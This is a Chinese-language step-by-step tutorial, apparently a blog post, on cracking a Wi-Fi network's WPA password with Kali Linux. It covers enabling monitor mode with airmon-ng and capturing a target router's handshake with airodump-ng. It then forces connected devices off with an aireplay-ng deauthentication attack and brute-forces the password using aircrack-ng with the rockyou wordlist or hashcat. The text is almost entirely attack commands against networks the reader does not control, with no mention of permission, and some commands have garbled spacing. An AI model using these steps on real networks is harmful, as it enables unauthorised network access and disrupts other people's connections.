kali详细破解wifi

前言准备

1：kali系统

2：网卡（能启动ap功能）

3：字典（用于破解跑密码使用）

开始

1

查看网卡是否支持监听模式

airmon-ng

wlan0代表我的网卡，也说明支持监听模式

2

开启监听模式

airmon-ng startwlan0

执行成功之后网卡接口变为wlan0mon；可以使用ifconfig命令查看

ifconfig

3

查看WiFi网络

airodump-ng wlan0

此时，会列出了周围的wifi和它们的详细信息，包括信号强度、加密类型、频道等。记住要破解wifi的频道号和BSSID。按Ctrl-C结束

4

抓取握手包

airodump-ng wlan0mon

开始抓包

airodump-ng -c<频道号>--bssid<目标>-w ~/01 wlan0mon

参数解释

-c指定频道号

–bssid指定路由器bssid

-w指定抓取的数据包保存位置

注意此处的空格

5

强制攻击wifi的设备重新连接路由器

经过步骤④，我们需要等用户连接/重连接wifi，才能抓到包，此时，就可能需要很长时间，因为并比一定一定有新用户连接此WiFi，所以，我们需要迫使用户连接WiFi

打开新终端执行

aireplay-ng -0 <攻击次数>-a <被攻击AP的MAC>-c <连接的设备>wlan0mon

参数解释

-0表示发起deauthentication攻击

-a指定无线路由器BSSID

-c指定强制断开的设备

注意此处代码空格。

如果成功，会如下图

得到wpa handshake后，按Ctrl-C结束

我们已经得到了想要的握手包了，可以结束无线网卡的监控模式

airmon-ng stopwlan0mon

6

开始破解密码

aircrack-ng- a2 -b <目标> -w /usr/share/wordlists/rockyou.txt~/*.cap

参数解释

-a2代表WPA的握手包

-b指定要破解的wifi BSSID。

-w指定字典文件

-最后是抓取的包。

然后就是等待了，可能几分钟，也可能几个小时，这就根据电脑性能和密码的复杂程度了。如果不成功，可使用其他字典，再破解

7

用hashcat破解

在线将cap转为hccap格式

网址 https://hashcat.net/cap2hccapx/

用aircrack-ng把cap转换成hccap类型数据包

aircrack-ng <目标.cap>-J <保存名字>

使用用hashcat破解WPA/PSK密码

hashcat-m2500 名字hccap字典.txt

（ -m 2500为破解的模式为WPA/PSK方式）